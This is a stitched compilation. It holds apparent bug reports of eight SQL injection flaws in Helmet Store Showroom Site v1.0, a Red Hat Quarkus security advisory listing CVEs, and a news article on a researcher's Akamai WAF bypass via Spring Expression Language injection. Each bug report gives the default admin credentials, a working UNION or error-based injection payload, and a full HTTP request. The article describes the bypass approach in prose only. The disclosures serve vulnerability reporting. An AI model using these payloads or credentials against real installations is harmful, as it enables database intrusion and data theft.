Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=client/manage_client&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

First execute the following sql statement in the database to create the clients table

CREATE TABLE \`clients\` (
  \`id\` int(11) NOT NULL,
) ENGINE\=InnoDB DEFAULT CHARSET\=utf8mb4;
COMMIT;

Vulnerability File: /hss/admin/?page=client/manage\_client&id=

Vulnerability location: /hss/admin/?page=client/manage\_client&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=client/manage\_client&id=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=client/manage\_client&id\=1%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46125: bug_report/SQLi-10.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/manage_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/manage\_category.php?id=

Vulnerability location: /hss/admin/categories/manage\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/manage\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/manage\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46123: bug_report/SQLi-7.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/categories/view_category.php?id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/categories/view\_category.php?id=

Vulnerability location: /hss/admin/categories/view\_category.php?id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/categories/view\_category.php?id=-5%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> id

GET /hss/admin/categories/view\_category.php?id\=\-5%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46122: bug_report/SQLi-6.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=categories&c=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=categories&c=

Vulnerability location: /hss/?page=categories&c=, c

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=categories&c=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> c

GET /hss/?page\=categories&c\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46119: bug_report/SQLi-3.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/?page=product_per_brand&bid=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/?page=product\_per\_brand&bid=

Vulnerability location: /hss/?page=product\_per\_brand&bid=, id

dbname =hss\_db,length=6

\[+\] Payload: /hss/?page=product\_per\_brand&bid=-2%27%20union%20select%201,database(),3,4,5,6--+ // Leak place ---> bid

GET /hss/?page\=product\_per\_brand&bid\=\-2%27%20union%20select%201,database(),3,4,5,6\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46118: bug_report/SQLi-2.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=user/manage_user&id=.

Permalink

Cannot retrieve contributors at this time

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=user/manage\_user&id=

Vulnerability location: /hss/admin/?page=user/manage\_user&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=user/manage\_user&id=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)--+ // Leak place ---> id

GET /hss/admin/?page\=user/manage\_user&id\=3%27%20and%20updatexml(1,concat(0x7e,(select%20database()),0x7e),0)\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46124: bug_report/SQLi-9.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/view_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/view\_product&id=

Vulnerability location: /hss/admin/?page=products/view\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/view\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13--+ // Leak place ---> id

GET /hss/admin/?page\=products/view\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10,11,12,13\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46120: bug_report/SQLi-4.md at main · HMHYHM/bug_report

Helmet Store Showroom Site v1.0 is vulnerable to SQL Injection via /hss/admin/?page=products/manage_product&id=.

**Helmet Store Showroom Site v1.0 by oretnom23 has SQL injection**

BUG\_Author: HMHYHM

Login account: admin/admin123 (Super Admin account)

vendors: https://www.sourcecodester.com/php/15851/helmet-store-showroom-site-php-and-mysql-free-source-code.html

The program is built using the xmapp-php8.1 version

Vulnerability File: /hss/admin/?page=products/manage\_product&id=

Vulnerability location: /hss/admin/?page=products/manage\_product&id=,id

dbname =hss\_db,length=6

\[+\] Payload: /hss/admin/?page=products/manage\_product&id=-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10--+ // Leak place ---> id

GET /hss/admin/?page\=products/manage\_product&id\=\-2%27%20union%20select%201,2,3,4,database(),6,7,8,9,10\--\+ HTTP/1.1
Host: 192.168.1.88
User\-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q\=0.9,\*/\*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=29mcgvmjo6mqsepd64ra2rlt4v
Connection: close

CVE-2022-46121: bug_report/SQLi-5.md at main · HMHYHM/bug_report

An update is now available for Red Hat build of Quarkus. Red Hat Product
Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2022-3171: protobuf-java: timeout in parser leads to DoS
* CVE-2022-4116: quarkus_dev_ui: Dev UI Config Editor is vulnerable to drive-by localhost attacks leading to RCE
* CVE-2022-4147: quarkus-vertx-http: Security misconfiguration of CORS : OWASP A05_2021 level in Quarkus
* CVE-2022-31197: postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names
* CVE-2022-37734: graphql-java: DoS by malicious query
* CVE-2022-42003: jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS
* CVE-2022-42004: jackson-databind: use of deeply nested arrays
* CVE-2022-42889: apache-commons-text: variable interpolation RCE


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   OpenShift Dev Spaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2022-12-14

Updated:

2022-12-14

**RHSA-2022:9023 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: Red Hat build of Quarkus 2.13.5 release and security update

**Type/Severity**

Security Advisory: Important

**Topic**

An update is now available for Red Hat build of Quarkus. Red Hat Product  
Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability. For more information, see the CVE links in the References section.

**Description**

This release of Red Hat build of Quarkus 2.13.5 includes security updates, bug  
fixes, and enhancements. For more information, see the release notes page listed in the References section.  

Security Fix(es):  

*   CVE-2022-4147 quarkus-vertx-http: Security misconfiguration of CORS : OWASP A05\_2021 level in Quarkus
*   CVE-2022-4116 quarkus\_dev\_ui: Dev UI Config Editor is vulnerable to drive-by localhost attacks leading to RCE
*   CVE-2022-37734 graphql-java: DoS by malicious query
*   CVE-2022-3171 protobuf-java: timeout in parser leads to DoS
*   CVE-2022-42889 commons-text: apache-commons-text: variable interpolation RCE
*   CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP\_SINGLE\_VALUE\_ARRAYS
*   CVE-2022-42004 jackson-databind: use of deeply nested arrays
*   CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Solution**

Before applying this update, make sure all previously released errata  
relevant to your system have been applied.  

For details on how to apply this update, refer to:  

https://access.redhat.com/articles/11258

**Affected Products**

*   Red Hat Build of Quarkus Text-Only Advisories x86\_64

**Fixes**

*   BZ - 2126809 - CVE-2022-37734 graphql-java: DoS by malicious query
*   BZ - 2129428 - CVE-2022-31197 postgresql: SQL Injection in ResultSet.refreshRow() with malicious column names
*   BZ - 2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP\_SINGLE\_VALUE\_ARRAYS
*   BZ - 2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays
*   BZ - 2135435 - CVE-2022-42889 apache-commons-text: variable interpolation RCE
*   BZ - 2137645 - CVE-2022-3171 protobuf-java: timeout in parser leads to DoS
*   BZ - 2144748 - CVE-2022-4116 quarkus\_dev\_ui: Dev UI Config Editor is vulnerable to drive-by localhost attacks leading to RCE
*   BZ - 2148867 - CVE-2022-4147 quarkus-vertx-http: Security misconfiguration of CORS : OWASP A05\_2021 level in Quarkus

**CVEs**

*   CVE-2022-3171
*   CVE-2022-4116
*   CVE-2022-4147
*   CVE-2022-31197
*   CVE-2022-37734
*   CVE-2022-42003
*   CVE-2022-42004
*   CVE-2022-42889

**References**

*   https://access.redhat.com/security/updates/classification/#important
*   https://access.redhat.com/articles/4966181
*   https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=redhat.quarkus&version=2.13.5

**Red Hat Build of Quarkus Text-Only Advisories**

SRPM

x86\_64

The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/.

RHSA-2022:9023: Red Hat Security Advisory: Red Hat build of Quarkus 2.13.5 release and security update

Akamai issued an update to resolve the flaw several months ago

Charlie Osborne 14 December 2022 at 12:01 UTC  
Updated: 14 December 2022 at 12:04 UTC

Akamai issued an update to resolve the flaw several months ago

A researcher has disclosed a technique that bypassed Akamai web application firewalls (WAF) running Spring Boot, potentially leading to remote code execution (RCE).

Akamai’s WAF, which was patched several months ago, has been designed to mitigate the risk of Distributed Denial-of-Service (DDoS) attacks and uses adaptive technologies to block known web security threats.

Security researcher Peter H, who also goes by the pseudonym ‘pmnh’, said the attack used Spring Expression Language (SpEL) injection.

The bug bounty hunter found the bypass with the assistance of Synack pentester Usman Mansha during an engagement with a private Bugcrowd program.

**Server-side template injection**

A server-side template injection (SSTI) is at the core of the bypass, a technical write-up by Peter H reveals. Vulnerable versions of Spring Boot throw up error messages in a SpEL expression with whitelabel error pages, they explained. When a vulnerable framework is used, this injection is evaluated server-side – opening a potential pathway for abuse.

Akamai’s WAF blocked the SSTI during testing. However, the team persisted in looking for ways of utilizing SpEL to invoke an operating system command – likely via Java.

RELATED JSON syntax hack allowed SQL injection payloads to be smuggled past WAFs

The most obvious route was to find a way to the class, starting with SpEL reference , but this was blocked by Akamai’s software.

“I suspected this would not work, but when trying to work around a WAF it’s really important to build up from small things that you know work, to larger and more complex payloads,” the researcher said.

The next stage was finding a reference to an arbitrary class, which Peter H said would allow “direct method invocation or reflection-based invocation to get at the method we want”.

Peter H and Mansha used a reflection method to obtain access to , built an arbitrary String with the value, accessed the method, and created another string to access – thus enabling development of a workable RCE payload.

The final payload was under 3kb and was accepted by the server as a GET request.

**Elusive entry point**

However, bypassing the WAF was by no means an easy task. Peter H noted it took approximately 500 crafted attempts and over 14 hours to find an entry point.

The researcher declined to supply a final payload in a text format to prevent blind copycats.

“In this case, deep knowledge of Java and SpEL capabilities was required to construct a payload that would both bypass the Akamai WAF as well as work in the context where it was executing,” they noted.

**Akamai response**

When approached for comment, Akamai told The Daily Swig that the bypass was only possible as the researchers used an old version of the Akamai WAF protection engine.

A patch was issued on July 25, 2022. As a result, customers running the latest engine version are not at risk of exploitation.

Read more of the latest web application firewall news

Akamai said: “Akamai is aware of the findings of a security researcher who has claimed to have bypassed Akamai’s WAF. This issue was discovered and an update was issued several months prior to this blog post being published.

“The Akamai Threat Research team is always on the lookout for new attack types and works to proactively update protections on a regular basis. Akamai recommends that all customers ensure that Adaptive Security Engine, the protection engine that powers Akamai WAF, is up to date, ideally via automatic updates.”

The Daily Swig has reached out to the researchers involved and we will update this article if and when they comment.

DON’T MISS Black Hat Europe 2022: Hacking tools showcased at annual security conference

Tag

#sql